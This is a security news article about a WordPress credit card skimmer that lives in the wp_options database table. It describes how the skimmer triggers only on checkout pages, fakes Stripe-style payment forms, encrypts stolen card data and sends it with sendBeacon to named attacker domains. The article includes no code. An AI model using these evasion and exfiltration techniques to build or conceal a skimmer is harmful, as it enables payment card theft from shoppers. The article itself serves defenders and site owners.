Covert WordPress Payment Card Skimmer Injects Itself on Checkout Pages, Going Unnoticed

• Security researchers uncovered a stealthy WordPress card skimmer that embeds itself directly into the checkout process.
• The malware uses data transfer obfuscation and does not target theme files or plugins to avoid detection.
• It works by hijacking legitimate payment fields to steal real-time data or generating a fake payment card form that mimics popular tools like Stripe.

A sophisticated credit card skimmer malware targeting WordPress websites silently embeds itself into database entries, evading detection by traditional file-scanning tools. It injects malicious JavaScript into the "wp_options" table under the "widget_block" row.

Sucuri’s SiteCheck tool has flagged this malware as "malware.magento_shoplift.273". Detection is based on identifying suspicious scripts, obfuscated patterns, and connections to known malicious domains.

The JavaScript activates only on checkout pages and dynamically checks if the page URL includes the keyword “checkout” while excluding “cart,” as this guarantees activation only when users are prepared to submit payment details. 

From here, the malware hijacks legitimate payment fields to steal data in real-time or generates a convincing fake credit card form mimicking fields from popular payment processors like Stripe. This way, the form captures sensitive payment information such as credit card numbers, expiration dates, CVV codes, and billing information without alerting the user. 

The stolen data is obfuscated using Base64 encoding combined with AES-CBC encryption. These techniques make the collected data appear benign during transit and difficult for cybersecurity professionals to analyze. 

Data is silently transmitted to attacker-controlled domains, such as "valhafather[.]xyz" and "fqbe23[.]xyz", via the navigator.sendBeacon function, which operates without disrupting user experience.

The malware embeds itself into the HTML block widget through the WordPress admin panel ("wp-admin > widgets"). This vector allows the malware to bypass file-based security scans commonly employed by website owners. 

Although only two websites are currently known to be infected, the implications are severe. This malware effectively targets checkout pages, compromising sensitive payment information, security codes, and personal details without detection, which attackers can use for fraudulent transactions or sell on underground markets. 

Last year, over 6,000 WordPress sites worldwide were compromised, leading to the installation of malicious plugins designed to push info-stealers.